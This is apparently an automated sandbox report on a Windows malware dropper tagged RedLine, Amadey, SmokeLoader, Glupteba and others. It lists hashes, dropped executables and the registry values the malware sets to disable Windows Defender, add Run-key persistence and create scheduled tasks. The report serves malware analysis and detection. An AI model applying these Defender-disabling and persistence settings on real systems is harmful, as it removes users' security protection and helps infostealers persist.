C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2Yy4755.exe

MD5 9f7da01ebd8a0ab0d1711de39405883d
SHA1 e92b5303fcae4341f66b365e9df00a191e82c59b
SHA256 9a39312d99741edf3f4a575151ee4d46731bb84baba1ed44fd2a00952d1f01d5
SHA512 62ce69db5827f6a88e9bede29431ab1ab4dc1418fbd4a22c6fdc778c9fc1b1223929964d5c65011f288ffb7271a80591f06e4c0c398ce3c98e163eac904e9200

\Users\Admin\AppData\Local\Temp\IXP003.TMP\2Yy4755.exe

MD5 9f7da01ebd8a0ab0d1711de39405883d
SHA1 e92b5303fcae4341f66b365e9df00a191e82c59b
SHA256 9a39312d99741edf3f4a575151ee4d46731bb84baba1ed44fd2a00952d1f01d5
SHA512 62ce69db5827f6a88e9bede29431ab1ab4dc1418fbd4a22c6fdc778c9fc1b1223929964d5c65011f288ffb7271a80591f06e4c0c398ce3c98e163eac904e9200

memory/2712-76-0x0000000000400000-0x0000000000433000-memory.dmp

memory/2712-77-0x0000000000400000-0x0000000000433000-memory.dmp

memory/2712-78-0x0000000000400000-0x0000000000433000-memory.dmp

memory/2712-79-0x0000000000400000-0x0000000000433000-memory.dmp

memory/2712-80-0x0000000000400000-0x0000000000433000-memory.dmp

memory/2712-81-0x0000000000400000-0x0000000000433000-memory.dmp

memory/2712-82-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp

memory/2712-83-0x0000000000400000-0x0000000000433000-memory.dmp

memory/2712-85-0x0000000000400000-0x0000000000433000-memory.dmp

memory/2712-87-0x0000000000400000-0x0000000000433000-memory.dmp

\Users\Admin\AppData\Local\Temp\IXP003.TMP\2Yy4755.exe

MD5 9f7da01ebd8a0ab0d1711de39405883d
SHA1 e92b5303fcae4341f66b365e9df00a191e82c59b
SHA256 9a39312d99741edf3f4a575151ee4d46731bb84baba1ed44fd2a00952d1f01d5
SHA512 62ce69db5827f6a88e9bede29431ab1ab4dc1418fbd4a22c6fdc778c9fc1b1223929964d5c65011f288ffb7271a80591f06e4c0c398ce3c98e163eac904e9200

\Users\Admin\AppData\Local\Temp\IXP003.TMP\2Yy4755.exe

MD5 9f7da01ebd8a0ab0d1711de39405883d
SHA1 e92b5303fcae4341f66b365e9df00a191e82c59b
SHA256 9a39312d99741edf3f4a575151ee4d46731bb84baba1ed44fd2a00952d1f01d5
SHA512 62ce69db5827f6a88e9bede29431ab1ab4dc1418fbd4a22c6fdc778c9fc1b1223929964d5c65011f288ffb7271a80591f06e4c0c398ce3c98e163eac904e9200

\Users\Admin\AppData\Local\Temp\IXP003.TMP\2Yy4755.exe

MD5 9f7da01ebd8a0ab0d1711de39405883d
SHA1 e92b5303fcae4341f66b365e9df00a191e82c59b
SHA256 9a39312d99741edf3f4a575151ee4d46731bb84baba1ed44fd2a00952d1f01d5
SHA512 62ce69db5827f6a88e9bede29431ab1ab4dc1418fbd4a22c6fdc778c9fc1b1223929964d5c65011f288ffb7271a80591f06e4c0c398ce3c98e163eac904e9200

\Users\Admin\AppData\Local\Temp\IXP003.TMP\2Yy4755.exe

MD5 9f7da01ebd8a0ab0d1711de39405883d
SHA1 e92b5303fcae4341f66b365e9df00a191e82c59b
SHA256 9a39312d99741edf3f4a575151ee4d46731bb84baba1ed44fd2a00952d1f01d5
SHA512 62ce69db5827f6a88e9bede29431ab1ab4dc1418fbd4a22c6fdc778c9fc1b1223929964d5c65011f288ffb7271a80591f06e4c0c398ce3c98e163eac904e9200

Analysis: behavioral2

Detonation Overview

Submitted

2023-10-10 20:09

Reported

2023-10-10 20:12

Platform

win10v2004-20230915-en

Max time kernel

102s

Max time network

154s

Command Line

C:\Windows\Explorer.EXE

Signatures

Amadey

trojan amadey

DcRat

rat infostealer dcrat
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\fd2fde4b51e79039d00b43f7cd00b31f.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A

Detects Healer an antivirus disabler dropper

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Glupteba

loader dropper glupteba

Glupteba payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Healer

dropper healer

Modifies Windows Defender Real-time Protection settings

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1zg68IH7.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1zg68IH7.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1zg68IH7.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1zg68IH7.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\CF0.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\Users\Admin\AppData\Local\Temp\CF0.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\CF0.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1zg68IH7.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1zg68IH7.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Users\Admin\AppData\Local\Temp\CF0.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Users\Admin\AppData\Local\Temp\CF0.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Users\Admin\AppData\Local\Temp\CF0.exe N/A

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

SmokeLoader

trojan backdoor smokeloader

Downloads MZ/PE file

Drops file in Drivers directory

Description Indicator Process Target
File created C:\Windows\System32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Temp\latestX.exe N/A

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A

Stops running service(s)

evasion

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3027552071-446050021-1254071215-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\E87.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3027552071-446050021-1254071215-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3027552071-446050021-1254071215-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\564F.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3027552071-446050021-1254071215-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\5hl0oq6.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3027552071-446050021-1254071215-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\8D7.bat N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\tE5gS63.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\HG5ka69.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\sq6CQ71.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1zg68IH7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2Yy4755.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\3Uw30ar.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\4Bh039GC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\5hl0oq6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\47F.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\oW6Zt8oj.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\iO8uY9pP.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\674.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\YL1xJ1lt.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\MR9kh3on.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8D7.bat N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\C04.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\CF0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\E87.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2Ow203LP.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\564F.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\source1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\latestX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\86F5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\89E4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8F25.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
N/A N/A C:\Windows\rss\csrss.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\86F5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\86F5.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A

Reads user/profile data of web browsers

spyware stealer

Windows security modification

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\Temp\CF0.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1zg68IH7.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1zg68IH7.exe N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\fd2fde4b51e79039d00b43f7cd00b31f.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\HG5ka69.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\47F.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\iO8uY9pP.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP004.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\YL1xJ1lt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup4 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP005.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\MR9kh3on.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3027552071-446050021-1254071215-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\tE5gS63.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\sq6CQ71.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\oW6Zt8oj.exe N/A

Checks installed software on the system

discovery

Legitimate hosting services abused for malware hosting/C2

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\cmd.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Checks for VirtualBox DLLs, possible anti-VM trick

Description Indicator Process Target
File opened (read-only) \??\VBoxMiniRdrDN C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files\Google\Chrome\updater.exe C:\Users\Admin\AppData\Local\Temp\latestX.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\rss C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
File created C:\Windows\rss\csrss.exe C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2492 = "Aus Central W. Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2791 = "Novosibirsk Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-791 = "SA Western Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1822 = "Russia TZ 1 Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-212 = "Pacific Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2571 = "Turks and Caicos Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-131 = "US Eastern Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-442 = "Arabian Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1911 = "Russia TZ 10 Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Windows\SysWOW64\cmd.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-191 = "Mountain Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-961 = "Paraguay Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-301 = "Romance Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-462 = "Afghanistan Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-92 = "Pacific SA Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2942 = "Sao Tome Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\SysWOW64\cmd.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-172 = "Central Standard Time (Mexico)" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-231 = "Hawaiian Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-261 = "GMT Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-32 = "Mid-Atlantic Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-241 = "Samoa Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-771 = "Montevideo Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\cmd.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-252 = "Dateline Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-912 = "Mauritius Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1501 = "Turkey Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-571 = "China Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
